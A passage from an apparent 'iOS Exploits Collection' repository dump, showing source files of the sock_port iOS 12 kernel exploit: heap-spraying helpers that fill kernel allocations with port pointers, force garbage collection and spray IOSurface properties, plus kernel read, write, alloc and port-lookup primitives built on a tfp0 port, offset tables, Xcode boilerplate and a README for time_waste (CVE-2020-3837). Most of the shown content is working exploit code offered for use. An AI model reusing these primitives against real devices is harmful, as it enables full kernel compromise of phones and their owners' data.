--------------------------------------------------------------------------------
1 | //
2 | // exploit_utilities.c
3 | // sock_port
4 | //
5 | // Created by Jake James on 7/17/19.
6 | // Copyright © 2019 Jake James. All rights reserved.
7 | //
8 |
9 | #include "exploit_utilities.h"
10 |
11 | // from Ian Beer. make a kernel allocation with the kernel address of 'target_port', 'count' times
12 | mach_port_t fill_kalloc_with_port_pointer(mach_port_t target_port, int count, int disposition) {
13 | mach_port_t q = MACH_PORT_NULL;
14 | kern_return_t err;
15 | err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &q);
16 | if (err != KERN_SUCCESS) {
17 | printf("[-] failed to allocate port\n");
18 | return 0;
19 | }
20 |
21 | mach_port_t* ports = malloc(sizeof(mach_port_t) * count);
22 | for (int i = 0; i < count; i++) {
23 | ports[i] = target_port;
24 | }
25 |
26 | struct ool_msg* msg = (struct ool_msg*)calloc(1, sizeof(struct ool_msg));
27 |
28 | msg->hdr.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0);
29 | msg->hdr.msgh_size = (mach_msg_size_t)sizeof(struct ool_msg);
30 | msg->hdr.msgh_remote_port = q;
31 | msg->hdr.msgh_local_port = MACH_PORT_NULL;
32 | msg->hdr.msgh_id = 0x41414141;
33 |
34 | msg->body.msgh_descriptor_count = 1;
35 |
36 | msg->ool_ports.address = ports;
37 | msg->ool_ports.count = count;
38 | msg->ool_ports.deallocate = 0;
39 | msg->ool_ports.disposition = disposition;
40 | msg->ool_ports.type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
41 | msg->ool_ports.copy = MACH_MSG_PHYSICAL_COPY;
42 |
43 | err = mach_msg(&msg->hdr,
44 | MACH_SEND_MSG|MACH_MSG_OPTION_NONE,
45 | msg->hdr.msgh_size,
46 | 0,
47 | MACH_PORT_NULL,
48 | MACH_MSG_TIMEOUT_NONE,
49 | MACH_PORT_NULL);
50 |
51 | if (err != KERN_SUCCESS) {
52 | printf("[-] failed to send message: %s\n", mach_error_string(err));
53 | return MACH_PORT_NULL;
54 | }
55 |
56 | return q;
57 | }
58 |
59 | // Ian Beer
60 | size_t message_size_for_kalloc_size(size_t kalloc_size) {
61 | return ((3 * kalloc_size) / 4) - 0x74;
62 | }
63 |
64 | // Ian Beer
65 | mach_port_t send_kalloc_message(uint8_t *replacer_message_body, uint32_t replacer_body_size) {
66 | mach_port_t q = MACH_PORT_NULL;
67 | kern_return_t err;
68 | err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &q);
69 | if (err != KERN_SUCCESS) {
70 | printf("[-] failed to allocate port\n");
71 | return MACH_PORT_NULL;
72 | }
73 |
74 | mach_port_limits_t limits = {0};
75 | limits.mpl_qlimit = MACH_PORT_QLIMIT_LARGE;
76 | err = mach_port_set_attributes(mach_task_self(),
77 | q,
78 | MACH_PORT_LIMITS_INFO,
79 | (mach_port_info_t)&limits,
80 | MACH_PORT_LIMITS_INFO_COUNT);
81 | if (err != KERN_SUCCESS) {
82 | printf("[-] failed to increase queue limit\n");
83 | return MACH_PORT_NULL;
84 | }
85 |
86 | mach_msg_size_t msg_size = sizeof(struct simple_msg) + replacer_body_size;
87 | struct simple_msg *msg = (struct simple_msg *)malloc(msg_size);
88 | memset(msg, 0, sizeof(struct simple_msg));
89 | memcpy(&msg->buf[0], replacer_message_body, replacer_body_size);
90 |
91 | for (int i = 0; i < 256; i++) {
92 | msg->hdr.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0);
93 | msg->hdr.msgh_size = msg_size;
94 | msg->hdr.msgh_remote_port = q;
95 | msg->hdr.msgh_local_port = MACH_PORT_NULL;
96 | msg->hdr.msgh_id = 0x41414142;
97 |
98 | err = mach_msg(&msg->hdr,
99 | MACH_SEND_MSG|MACH_MSG_OPTION_NONE,
100 | msg_size,
101 | 0,
102 | MACH_PORT_NULL,
103 | MACH_MSG_TIMEOUT_NONE,
104 | MACH_PORT_NULL);
105 |
106 | if (err != KERN_SUCCESS) {
107 | printf("[-] failed to send message %x (%d): %s\n", err, i, mach_error_string(err));
108 | return MACH_PORT_NULL;
109 | }
110 | }
111 |
112 | return q;
113 | }
114 |
115 | // rest is from machswap
116 | void trigger_gc() {
117 | const int gc_ports_cnt = 100;
118 | int gc_ports_max = gc_ports_cnt;
119 | mach_port_t gc_ports[gc_ports_cnt] = { 0 };
120 |
121 | uint32_t body_size = (uint32_t)message_size_for_kalloc_size(16384) - sizeof(mach_msg_header_t); // 1024
122 | uint8_t *body = (uint8_t*)malloc(body_size);
123 | memset(body, 0x41, body_size);
124 |
125 | for (int i = 0; i < gc_ports_cnt; i++) {
126 | uint64_t t0, t1;
127 |
128 | t0 = mach_absolute_time();
129 | gc_ports[i] = send_kalloc_message(body, body_size);
130 | t1 = mach_absolute_time();
131 |
132 | if (t1 - t0 > 1000000) {
133 | printf("[+] got gc at %d -- breaking\n", i);
134 | gc_ports_max = i;
135 | break;
136 | }
137 | }
138 |
139 | for (int i = 0; i < gc_ports_max; i++) {
140 | mach_port_destroy(mach_task_self(), gc_ports[i]);
141 | }
142 |
143 | sched_yield();
144 | sleep(1);
145 | }
146 |
147 | mach_vm_size_t pagesize = 0;
148 |
149 | const uint64_t IOSURFACE_CREATE_SURFACE = 0;
150 | const uint64_t IOSURFACE_SET_VALUE = 9;
151 | const uint64_t IOSURFACE_GET_VALUE = 10;
152 | const uint64_t IOSURFACE_DELETE_VALUE = 11;
153 |
154 | int init_IOSurface() {
155 | kern_return_t ret = KERN_SUCCESS;
156 |
157 | ret = _host_page_size(mach_host_self(), (vm_size_t*)&pagesize);
158 | printf("[i] page size: 0x%llx, %s\n", pagesize, mach_error_string(ret));
159 | if (ret != KERN_SUCCESS) {
160 | printf("[-] failed to get page size! ret: %x %s\n", ret, mach_error_string(ret));
161 | return ret;
162 | }
163 | return !IOSurface_init();
164 | }
165 |
166 | void deinit_IOSurface() {
167 | IOSurface_deinit();
168 | }
169 |
170 | int spray_IOSurface(void *data, size_t size) {
171 | return !IOSurface_spray_with_gc(32, 256, data, (uint32_t)size, NULL);
172 | }
173 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/sock_port/exploit_utilities.h:
--------------------------------------------------------------------------------
1 | //
2 | // exploit_utilities.h
3 | // sock_port
4 | //
5 | // Created by Jake James on 7/17/19.
6 | // Copyright © 2019 Jake James. All rights reserved.
7 | //
8 |
9 | #ifndef exploit_utilities_h
10 | #define exploit_utilities_h
11 |
12 | #include
13 | #include
14 | #include
15 | #include
16 | #include
17 | #include
18 | #include
19 | #include
20 |
21 | #include "iosurface.h"
22 |
23 | struct ool_msg {
24 | mach_msg_header_t hdr;
25 | mach_msg_body_t body;
26 | mach_msg_ool_ports_descriptor_t ool_ports;
27 | };
28 |
29 | struct simple_msg {
30 | mach_msg_header_t hdr;
31 | char buf[0];
32 | };
33 |
34 | size_t message_size_for_kalloc_size(size_t kalloc_size);
35 | mach_port_t fill_kalloc_with_port_pointer(mach_port_t target_port, int count, int disposition);
36 | mach_port_t send_kalloc_message(uint8_t *replacer_message_body, uint32_t replacer_body_size);
37 | void trigger_gc(void);
38 |
39 | enum {
40 | kIOCFSerializeToBinary = 0x00000001U,
41 | };
42 |
43 | #define kOSSerializeBinarySignature 0x000000D3U
44 |
45 | enum {
46 | kOSSerializeDictionary = 0x01000000U,
47 | kOSSerializeArray = 0x02000000U,
48 | kOSSerializeSet = 0x03000000U,
49 | kOSSerializeNumber = 0x04000000U,
50 | kOSSerializeSymbol = 0x08000000U,
51 | kOSSerializeString = 0x09000000U,
52 | kOSSerializeData = 0x0a000000U,
53 | kOSSerializeBoolean = 0x0b000000U,
54 | kOSSerializeObject = 0x0c000000U,
55 |
56 | kOSSerializeTypeMask = 0x7F000000U,
57 | kOSSerializeDataMask = 0x00FFFFFFU,
58 |
59 | kOSSerializeEndCollection = 0x80000000U,
60 |
61 | kOSSerializeMagic = 0x000000d3U,
62 | };
63 |
64 | extern mach_vm_size_t pagesize;
65 |
66 | extern const uint64_t IOSURFACE_CREATE_SURFACE;
67 | extern const uint64_t IOSURFACE_SET_VALUE;
68 | extern const uint64_t IOSURFACE_GET_VALUE;
69 | extern const uint64_t IOSURFACE_DELETE_VALUE;
70 |
71 | int init_IOSurface(void);
72 | void deinit_IOSurface(void);
73 | int spray_IOSurface(void *data, size_t size);
74 |
75 | #endif /* exploit_utilities_h */
76 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/sock_port/include/IOKit/OSMessageNotification.h:
--------------------------------------------------------------------------------
1 | /*
2 | * Copyright (c) 1998-2000 Apple Computer, Inc. All rights reserved.
3 | *
4 | * @APPLE_LICENSE_HEADER_START@
5 | *
6 | * This file contains Original Code and/or Modifications of Original Code
7 | * as defined in and that are subject to the Apple Public Source License
8 | * Version 2.0 (the 'License'). You may not use this file except in
9 | * compliance with the License. Please obtain a copy of the License at
10 | * http://www.opensource.apple.com/apsl/ and read it before using this
11 | * file.
12 | *
13 | * The Original Code and all software distributed under the License are
14 | * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
15 | * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
16 | * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
17 | * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
18 | * Please see the License for the specific language governing rights and
19 | * limitations under the License.
20 | *
21 | * @APPLE_LICENSE_HEADER_END@
22 | */
23 | /*
24 | * Copyright (c) 1999 Apple Computer, Inc. All rights reserved.
25 | *
26 | * HISTORY
27 | *
28 | */
29 |
30 | #ifndef __OS_OSMESSAGENOTIFICATION_H
31 | #define __OS_OSMESSAGENOTIFICATION_H
32 |
33 | #ifdef __cplusplus
34 | extern "C" {
35 | #endif
36 |
37 | #include
38 | #include "IOReturn.h"
39 |
40 | enum {
41 | kFirstIOKitNotificationType = 100,
42 | kIOServicePublishNotificationType = 100,
43 | kIOServiceMatchedNotificationType = 101,
44 | kIOServiceTerminatedNotificationType = 102,
45 | kIOAsyncCompletionNotificationType = 150,
46 | kIOServiceMessageNotificationType = 160,
47 | kLastIOKitNotificationType = 199
48 | };
49 |
50 | enum {
51 | kOSNotificationMessageID = 53,
52 | kOSAsyncCompleteMessageID = 57,
53 | kMaxAsyncArgs = 16
54 | };
55 |
56 | enum {
57 | kIOAsyncReservedIndex = 0,
58 | kIOAsyncReservedCount,
59 |
60 | kIOAsyncCalloutFuncIndex = kIOAsyncReservedCount,
61 | kIOAsyncCalloutRefconIndex,
62 | kIOAsyncCalloutCount,
63 |
64 | kIOMatchingCalloutFuncIndex = kIOAsyncReservedCount,
65 | kIOMatchingCalloutRefconIndex,
66 | kIOMatchingCalloutCount,
67 |
68 | kIOInterestCalloutFuncIndex = kIOAsyncReservedCount,
69 | kIOInterestCalloutRefconIndex,
70 | kIOInterestCalloutServiceIndex,
71 | kIOInterestCalloutCount
72 | };
73 |
74 | enum {
75 | kOSAsyncRefCount = 8,
76 | kOSAsyncRefSize = 32
77 | };
78 | typedef natural_t OSAsyncReference[kOSAsyncRefCount];
79 |
80 | struct OSNotificationHeader {
81 | vm_size_t size; /* content size */
82 | natural_t type;
83 | OSAsyncReference reference;
84 |
85 | #if defined(__STDC_VERSION__) && (__STDC_VERSION__ >= 199901L)
86 | unsigned char content[];
87 | #else
88 | unsigned char content[0];
89 | #endif
90 | };
91 |
92 | struct IOServiceInterestContent {
93 | natural_t messageType;
94 | void * messageArgument[1];
95 | };
96 |
97 | struct IOAsyncCompletionContent {
98 | IOReturn result;
99 | #if defined(__STDC_VERSION__) && (__STDC_VERSION__ >= 199901L)
100 | void * args[];
101 | #else
102 | void * args[0];
103 | #endif
104 | };
105 |
106 | #ifndef __cplusplus
107 | typedef struct OSNotificationHeader OSNotificationHeader;
108 | typedef struct IOServiceInterestContent IOServiceInterestContent;
109 | typedef struct IOAsyncCompletionContent IOAsyncCompletionContent;
110 | #endif
111 |
112 | #ifdef __cplusplus
113 | }
114 | #endif
115 |
116 | #endif /* __OS_OSMESSAGENOTIFICATION_H */
117 |
118 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/sock_port/iosurface.h:
--------------------------------------------------------------------------------
1 | /*
2 | * iosurface.h
3 | * Brandon Azad
4 | */
5 | #ifndef VOUCHER_SWAP__IOSURFACE_H_
6 | #define VOUCHER_SWAP__IOSURFACE_H_
7 |
8 | #include
9 | #include
10 | #include
11 | #include
12 | #include
13 | #include
14 | #include
15 |
16 | #include "exploit_utilities.h"
17 |
18 | #ifdef IOSURFACE_EXTERN
19 | #define extern IOSURFACE_EXTERN
20 | #endif
21 |
22 | // The IOSurfaceRoot service.
23 | extern mach_port_t IOSurfaceRoot;
24 |
25 | // An IOSurfaceRootUserClient instance.
26 | extern mach_port_t IOSurfaceRootUserClient;
27 |
28 | // The ID of the IOSurface we're using.
29 | extern uint32_t IOSurface_id;
30 |
31 | /*
32 | * IOSurface_init
33 | *
34 | * Description:
35 | * Initialize the IOSurface subsystem.
36 | */
37 | bool IOSurface_init(void);
38 |
39 | /*
40 | * IOSurface_deinit
41 | *
42 | * Description:
43 | * Tear down the IOSurface subsystem. Any sprayed memory will be automatically deallocated.
44 | */
45 | void IOSurface_deinit(void);
46 |
47 | /*
48 | * IOSurface_spray_with_gc
49 | *
50 | * Description:
51 | * Spray kernel memory using IOSurface properties.
52 | *
53 | * The current implementation stores each data allocation in an OSString. The reason for this
54 | * is that OSString contents will be allocated using kalloc() even for allocations larger than
55 | * the page size. OSData on the other hand will use kmem_alloc() for large allocations.
56 | * Consequently, the last byte of data will be zeroed out to create a null terminator.
57 | */
58 | bool IOSurface_spray_with_gc(uint32_t array_count, uint32_t array_length,
59 | void *data, uint32_t data_size,
60 | void (^callback)(uint32_t array_id, uint32_t data_id, void *data, size_t size));
61 |
62 | /*
63 | * IOSurface_spray_size_with_gc
64 | *
65 | * Description:
66 | * Spray kernel memory using IOSurface properties.
67 | *
68 | * This function computes the number of elements per array automatically.
69 | */
70 | bool IOSurface_spray_size_with_gc(uint32_t array_count, size_t spray_size,
71 | void *data, uint32_t data_size,
72 | void (^callback)(uint32_t array_id, uint32_t data_id, void *data, size_t size));
73 |
74 | /*
75 | * IOSurface_spray_read_array
76 | *
77 | * Description:
78 | * Read back the data elements in a particular array in a particular IOSurface spray.
79 | */
80 | bool IOSurface_spray_read_array(uint32_t array_id, uint32_t array_length, uint32_t data_size,
81 | void (^callback)(uint32_t data_id, void *data, size_t size));
82 |
83 | /*
84 | * IOSurface_spray_read_all_data
85 | *
86 | * Description:
87 | * Read back all the data elements in an IOSurface spray.
88 | */
89 | bool IOSurface_spray_read_all_data(uint32_t array_count, uint32_t array_length, uint32_t data_size,
90 | void (^callback)(uint32_t array_id, uint32_t data_id, void *data, size_t size));
91 |
92 | /*
93 | * IOSurface_spray_remove_array
94 | *
95 | * Description:
96 | * Remove a particular array from an IOSurface spray, freeing the contained data elements.
97 | */
98 | bool IOSurface_spray_remove_array(uint32_t array_id);
99 |
100 | /*
101 | * IOSurface_spray_clear
102 | *
103 | * Description:
104 | * Remove all the arrays from an IOSurface spray, freeing all the data elements.
105 | */
106 | bool IOSurface_spray_clear(uint32_t array_count);
107 |
108 | // ---- IOSurface types ---------------------------------------------------------------------------
109 |
110 | struct _IOSurfaceFastCreateArgs {
111 | uint64_t address;
112 | uint32_t width;
113 | uint32_t height;
114 | uint32_t pixel_format;
115 | uint32_t bytes_per_element;
116 | uint32_t bytes_per_row;
117 | uint32_t alloc_size;
118 | };
119 |
120 | struct IOSurfaceLockResult {
121 | uint64_t addr1;
122 | uint64_t addr2;
123 | uint64_t addr3;
124 | uint32_t surface_id;
125 | uint8_t _pad2[0xdd0-0x18-0x4];
126 | };
127 |
128 | struct IOSurfaceValueArgs {
129 | uint32_t surface_id;
130 | uint32_t _out1;
131 | union {
132 | uint32_t xml[0];
133 | char string[0];
134 | };
135 | };
136 |
137 | struct IOSurfaceValueArgs_string {
138 | uint32_t surface_id;
139 | uint32_t _out1;
140 | uint32_t string_data;
141 | char null;
142 | };
143 |
144 | struct IOSurfaceValueResultArgs {
145 | uint32_t out;
146 | };
147 |
148 |
149 | bool IOSurface_set_value(const struct IOSurfaceValueArgs *args, size_t args_size);
150 |
151 | #undef extern
152 |
153 | #endif
154 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/sock_port/kernel_memory.c:
--------------------------------------------------------------------------------
1 | //
2 | // kernel_memory.c
3 | // sock_port
4 | //
5 | // Created by Jake James on 7/18/19.
6 | // Copyright © 2019 Jake James. All rights reserved.
7 | //
8 |
9 | #include "kernel_memory.h"
10 |
11 | static mach_port_t tfpzero;
12 |
13 | void init_kernel_memory(mach_port_t tfp0) {
14 | tfpzero = tfp0;
15 | }
16 |
17 | uint64_t kalloc(vm_size_t size) {
18 | mach_vm_address_t address = 0;
19 | mach_vm_allocate(tfpzero, (mach_vm_address_t *)&address, size, VM_FLAGS_ANYWHERE);
20 | return address;
21 | }
22 |
23 | void kfree(mach_vm_address_t address, vm_size_t size) {
24 | mach_vm_deallocate(tfpzero, address, size);
25 | }
26 |
27 | size_t kread(uint64_t where, void *p, size_t size) {
28 | int rv;
29 | size_t offset = 0;
30 | while (offset < size) {
31 | mach_vm_size_t sz, chunk = 2048;
32 | if (chunk > size - offset) {
33 | chunk = size - offset;
34 | }
35 | rv = mach_vm_read_overwrite(tfpzero, where + offset, chunk, (mach_vm_address_t)p + offset, &sz);
36 | if (rv || sz == 0) {
37 | printf("[-] error on kread(0x%016llx)\n", where);
38 | break;
39 | }
40 | offset += sz;
41 | }
42 | return offset;
43 | }
44 |
45 | uint32_t rk32(uint64_t where) {
46 | uint32_t out;
47 | kread(where, &out, sizeof(uint32_t));
48 | return out;
49 | }
50 |
51 | uint64_t rk64(uint64_t where) {
52 | uint64_t out;
53 | kread(where, &out, sizeof(uint64_t));
54 | return out;
55 | }
56 |
57 | size_t kwrite(uint64_t where, const void *p, size_t size) {
58 | int rv;
59 | size_t offset = 0;
60 | while (offset < size) {
61 | size_t chunk = 2048;
62 | if (chunk > size - offset) {
63 | chunk = size - offset;
64 | }
65 | rv = mach_vm_write(tfpzero, where + offset, (mach_vm_offset_t)p + offset, (int)chunk);
66 | if (rv) {
67 | printf("[-] error on kwrite(0x%016llx)\n", where);
68 | break;
69 | }
70 | offset += chunk;
71 | }
72 | return offset;
73 | }
74 |
75 | void wk32(uint64_t where, uint32_t what) {
76 | uint32_t _what = what;
77 | kwrite(where, &_what, sizeof(uint32_t));
78 | }
79 |
80 |
81 | void wk64(uint64_t where, uint64_t what) {
82 | uint64_t _what = what;
83 | kwrite(where, &_what, sizeof(uint64_t));
84 | }
85 |
86 | uint64_t find_port(mach_port_name_t port, uint64_t task_self) {
87 | uint64_t task_addr = rk64(task_self + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));
88 | uint64_t itk_space = rk64(task_addr + koffset(KSTRUCT_OFFSET_TASK_ITK_SPACE));
89 | uint64_t is_table = rk64(itk_space + koffset(KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE));
90 |
91 | uint32_t port_index = port >> 8;
92 | const int sizeof_ipc_entry_t = 0x18;
93 |
94 | uint64_t port_addr = rk64(is_table + (port_index * sizeof_ipc_entry_t));
95 |
96 | return port_addr;
97 | }
98 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/sock_port/kernel_memory.h:
--------------------------------------------------------------------------------
1 | //
2 | // kernel_memory.h
3 | // sock_port
4 | //
5 | // Created by Jake James on 7/18/19.
6 | // Copyright © 2019 Jake James. All rights reserved.
7 | //
8 |
9 | #ifndef kernel_memory_h
10 | #define kernel_memory_h
11 |
12 | #include
13 | #include
14 | #include "offsets.h"
15 |
16 | kern_return_t mach_vm_allocate(vm_map_t target, mach_vm_address_t *address, mach_vm_size_t size, int flags);
17 | kern_return_t mach_vm_read_overwrite(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, mach_vm_address_t data, mach_vm_size_t *outsize);
18 | kern_return_t mach_vm_write(vm_map_t target_task, mach_vm_address_t address, vm_offset_t data, mach_msg_type_number_t dataCnt);
19 | kern_return_t mach_vm_deallocate(vm_map_t target, mach_vm_address_t address, mach_vm_size_t size);;
20 | kern_return_t mach_vm_read(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, vm_offset_t *data, mach_msg_type_number_t *dataCnt);
21 |
22 | void init_kernel_memory(mach_port_t tfp0);
23 |
24 | size_t kread(uint64_t where, void *p, size_t size);
25 | uint32_t rk32(uint64_t where);
26 | uint64_t rk64(uint64_t where);
27 |
28 | size_t kwrite(uint64_t where, const void *p, size_t size);
29 | void wk32(uint64_t where, uint32_t what);
30 | void wk64(uint64_t where, uint64_t what);
31 |
32 | void kfree(mach_vm_address_t address, vm_size_t size);
33 | uint64_t kalloc(vm_size_t size);
34 |
35 | uint64_t find_port(mach_port_name_t port, uint64_t task_self);
36 |
37 | #endif /* kernel_memory_h */
38 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/sock_port/main.m:
--------------------------------------------------------------------------------
1 | //
2 | // main.m
3 | // sock_port
4 | //
5 | // Created by Jake James on 7/17/19.
6 | // Copyright © 2019 Jake James. All rights reserved.
7 | //
8 |
9 | #import
10 | #import "AppDelegate.h"
11 |
12 | int main(int argc, char * argv[]) {
13 | @autoreleasepool {
14 | return UIApplicationMain(argc, argv, nil, NSStringFromClass([AppDelegate class]));
15 | }
16 | }
17 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/sock_port/offsets.h:
--------------------------------------------------------------------------------
1 | enum kstruct_offset {
2 | /* struct task */
3 | KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE,
4 | KSTRUCT_OFFSET_TASK_REF_COUNT,
5 | KSTRUCT_OFFSET_TASK_ACTIVE,
6 | KSTRUCT_OFFSET_TASK_VM_MAP,
7 | KSTRUCT_OFFSET_TASK_NEXT,
8 | KSTRUCT_OFFSET_TASK_PREV,
9 | KSTRUCT_OFFSET_TASK_ITK_SELF,
10 | KSTRUCT_OFFSET_TASK_ITK_SPACE,
11 | KSTRUCT_OFFSET_TASK_BSD_INFO,
12 |
13 | /* struct ipc_port */
14 | KSTRUCT_OFFSET_IPC_PORT_IO_BITS,
15 | KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES,
16 | KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE,
17 | KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT,
18 | KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER,
19 | KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT,
20 | KSTRUCT_OFFSET_IPC_PORT_IP_PREMSG,
21 | KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT,
22 | KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS,
23 |
24 | /* struct proc */
25 | KSTRUCT_OFFSET_PROC_PID,
26 | KSTRUCT_OFFSET_PROC_P_FD,
27 |
28 | /* struct filedesc */
29 | KSTRUCT_OFFSET_FILEDESC_FD_OFILES,
30 |
31 | /* struct fileproc */
32 | KSTRUCT_OFFSET_FILEPROC_F_FGLOB,
33 |
34 | /* struct fileglob */
35 | KSTRUCT_OFFSET_FILEGLOB_FG_DATA,
36 |
37 | /* struct socket */
38 | KSTRUCT_OFFSET_SOCKET_SO_PCB,
39 |
40 | /* struct pipe */
41 | KSTRUCT_OFFSET_PIPE_BUFFER,
42 |
43 | /* struct ipc_space */
44 | KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE_SIZE,
45 | KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE,
46 |
47 | KFREE_ADDR_OFFSET,
48 | };
49 |
50 | int koffset(enum kstruct_offset offset);
51 | void offsets_init(void);
52 |
53 | extern uint32_t create_outsize;
54 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/sock_port_UITests/Info.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | CFBundleDevelopmentRegion
6 | $(DEVELOPMENT_LANGUAGE)
7 | CFBundleExecutable
8 | $(EXECUTABLE_NAME)
9 | CFBundleIdentifier
10 | $(PRODUCT_BUNDLE_IDENTIFIER)
11 | CFBundleInfoDictionaryVersion
12 | 6.0
13 | CFBundleName
14 | $(PRODUCT_NAME)
15 | CFBundlePackageType
16 | BNDL
17 | CFBundleShortVersionString
18 | 1.0
19 | CFBundleVersion
20 | 1
21 |
22 |
23 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/sock_port_UITests/socket_freeUITests.m:
--------------------------------------------------------------------------------
1 | //
2 | // sock_portUITests.m
3 | // sock_portUITests
4 | //
5 | // Created by Jake James on 7/17/19.
6 | // Copyright © 2019 Jake James. All rights reserved.
7 | //
8 |
9 | #import
10 |
11 | @interface sock_portUITests : XCTestCase
12 |
13 | @end
14 |
15 | @implementation sock_portUITests
16 |
17 | - (void)setUp {
18 | [super setUp];
19 |
20 | // Put setup code here. This method is called before the invocation of each test method in the class.
21 |
22 | // In UI tests it is usually best to stop immediately when a failure occurs.
23 | self.continueAfterFailure = NO;
24 | // UI tests must launch the application that they test. Doing this in setup will make sure it happens for each test method.
25 | [[[XCUIApplication alloc] init] launch];
26 |
27 | // In UI tests it’s important to set the initial state - such as interface orientation - required for your tests before they run. The setUp method is a good place to do this.
28 | }
29 |
30 | - (void)tearDown {
31 | // Put teardown code here. This method is called after the invocation of each test method in the class.
32 | [super tearDown];
33 | }
34 |
35 | - (void)testExample {
36 | // Use recording to get started writing UI tests.
37 | // Use XCTAssert and related functions to verify your tests produce the correct results.
38 | }
39 |
40 | @end
41 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/sock_port_tests/Info.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | CFBundleDevelopmentRegion
6 | $(DEVELOPMENT_LANGUAGE)
7 | CFBundleExecutable
8 | $(EXECUTABLE_NAME)
9 | CFBundleIdentifier
10 | $(PRODUCT_BUNDLE_IDENTIFIER)
11 | CFBundleInfoDictionaryVersion
12 | 6.0
13 | CFBundleName
14 | $(PRODUCT_NAME)
15 | CFBundlePackageType
16 | BNDL
17 | CFBundleShortVersionString
18 | 1.0
19 | CFBundleVersion
20 | 1
21 |
22 |
23 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/sock_port_tests/socket_freeTests.m:
--------------------------------------------------------------------------------
1 | //
2 | // sock_portTests.m
3 | // sock_portTests
4 | //
5 | // Created by Jake James on 7/17/19.
6 | // Copyright © 2019 Jake James. All rights reserved.
7 | //
8 |
9 | #import
10 |
11 | @interface sock_portTests : XCTestCase
12 |
13 | @end
14 |
15 | @implementation sock_portTests
16 |
17 | - (void)setUp {
18 | [super setUp];
19 | // Put setup code here. This method is called before the invocation of each test method in the class.
20 | }
21 |
22 | - (void)tearDown {
23 | // Put teardown code here. This method is called after the invocation of each test method in the class.
24 | [super tearDown];
25 | }
26 |
27 | - (void)testExample {
28 | // This is an example of a functional test case.
29 | // Use XCTAssert and related functions to verify your tests produce the correct results.
30 | }
31 |
32 | - (void)testPerformanceExample {
33 | // This is an example of a performance test case.
34 | [self measureBlock:^{
35 | // Put the code you want to measure the time of here.
36 | }];
37 | }
38 |
39 | @end
40 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 13/readme.md:
--------------------------------------------------------------------------------
1 | This is iOS 13 stuff. Offsets, tools, changes, exploits, etc.
2 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/readme.md:
--------------------------------------------------------------------------------
1 | Only the most stable one is linked here.
2 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/time_waste/README.md:
--------------------------------------------------------------------------------
1 | # time_waste
2 |
3 | iOS 12.0-13.3 tfp0 for all devices (in theory) using heap overflow bug by Brandon Azad (CVE-2020-3837) and cuck00 info leak by Siguza (will probably remove in the future). Exploitation is mostly the same as oob_timestamp with a few differences. The main difference is that this one does not rely on hardcoded addresses and thus should be more reliable. The rest of the code is under GPL (exception given to the unc0ver team)
4 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/time_waste/time_waste.xcodeproj/project.xcworkspace/contents.xcworkspacedata:
--------------------------------------------------------------------------------
1 |
2 |
4 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/time_waste/time_waste.xcodeproj/project.xcworkspace/xcshareddata/IDEWorkspaceChecks.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | IDEDidComputeMac32BitWarning
6 |
7 |
8 |
9 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/time_waste/time_waste.xcodeproj/project.xcworkspace/xcuserdata/jakejames.xcuserdatad/UserInterfaceState.xcuserstate:
--------------------------------------------------------------------------------
